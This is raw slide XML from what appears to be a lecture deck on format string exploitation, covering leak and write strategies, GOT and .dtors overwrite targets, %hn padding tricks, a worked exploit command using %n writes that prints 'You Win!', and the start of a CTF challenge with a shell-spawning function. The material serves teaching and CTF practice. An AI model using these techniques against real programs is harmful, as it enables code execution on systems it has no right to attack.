                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 16</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 17 	return 0;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> 18 }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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Shape 2097"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2098" name="Shape 2098"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>./fmt $(python2 -c 'print "\x34\xa0\x04\x08\x36\xa0\x04\x08%4911x%7$hn%65536x%8$hn"')</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>You Win!</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF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099" name="Shape 2099"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823000" y="3439633"/>
            <a:ext cx="3588800" cy="11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2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>How to execute </a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2667" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>arbitrary code?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill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4" name="Shape 2104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Code Exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2105" name="Shape 2105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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indent="-423323">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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ret address on stack</a:t>
            </a:r>
            <a:endParaRPr sz="186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23323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="186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23323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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.dtors</a:t>
            </a:r>
            <a:endParaRPr sz="186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indent="0">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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readelf -s a.out |grep DTOR</a:t>
            </a:r>
            <a:endParaRPr sz="186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indent="0">
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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29: 08049518 	0 OBJECT  LOCAL  DEFAULT   19 __DTOR_LIST__</a:t>
            </a:r>
            <a:endParaRPr sz="186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indent="0">
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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56: 0804951c 	0 OBJECT  GLOBAL HIDDEN   19 __DTOR_END__</a:t>
            </a:r>
            <a:endParaRPr sz="186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23323">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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__atexit</a:t>
            </a:r>
            <a:endParaRPr sz="186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23323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"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...you name it</a:t>
            </a:r>
            <a:endParaRPr sz="186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indent="0">
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/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0" name="Shape 2110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read / write any position if map permission is allowed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GOT hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write variable value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak libc base address and calculate offset to get another function address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak libc version</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak stack address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2111" name="Shape 2111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Usage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8307C3B8-10D3-478D-A4AD-39BFBD97F1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782" y="944407"/>
            <a:ext cx="9926435" cy="5458587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830F8F2F-B7A8-459D-B16F-F6D68325B598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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进程虚拟地址空间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62928576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6" name="Shape 2116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Strategy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2117" name="Shape 2117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak Info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use %x %p to leak stack info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To leak arbitrary addr info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf on stack, write addr in buf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf not on stack, write addr pointer on stack first, then use another printf to leak</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If dest addr not known, leak addr first(mostly stack)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf on stack, use addr in buf (Libformatstr can help)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf not on stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Common way: use ebp-&gt;ebp pair (or sth similar) to change arbitrary addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If using snprintf, then write addr first using %n (suitable for 0x0804xxx)</a:t>
            </a:r>
            <a:endParaRPr/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2" name="Shape 2122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String tricks and gotchas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2123" name="Shape 2123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: How to calculate positional param?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A: Libc said that the behavior is undefined if positional param position is larger than provided non-positional param count. But for most case, the addr should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>word_size x position </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>So it’s more easier to open your gdb and use pattern string to find the actual position instead of calculating. Besides, %0$x is not recognised.</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: What if the second %n needs a small value to be written while bytes_written just goes larger?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: Just use integer overflow. (For example, if %hn applies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>second_padding=(second_size+65536-first_padding) % 65536 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/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8" name="Shape 2128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String tricks and gotchas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2129" name="Shape 2129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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indent="-423323">
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: When can I use %n and when shouldn’t?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: For printf, it’ll be too large to print out in your console(or socket if socat/xinetd used). But for snprintf, you can use %n with not too large values. (0x0804xxxx can be considered not too large) snprintf won’t overflow, but will calculate the actual value and return actual bytes_written.</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: Can I modify more than 1 values on stack within a single format string?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: Definitely you can.But if you want the second value addr to be based on the first modified value, there are some tricks here: The first %n must not be positional param. That’s because In libc implementation, the positional values are copied into an internal struct in function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867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printf_positional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> before applying fmt transformation.</a:t>
            </a:r>
            <a:endParaRPr sz="1867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4" name="Shape 2134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Format String Challenge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2135" name="Shape 2135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788133" y="1838933"/>
            <a:ext cx="10729600" cy="4673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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>// simplified version of SCTF 2016 pwn200</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>static s[0x400];</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>static buf[0x400];</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void run_system() { system("/bin/sh"); }</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="00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lnSpc>
                <a:spcPct val="115000"/>
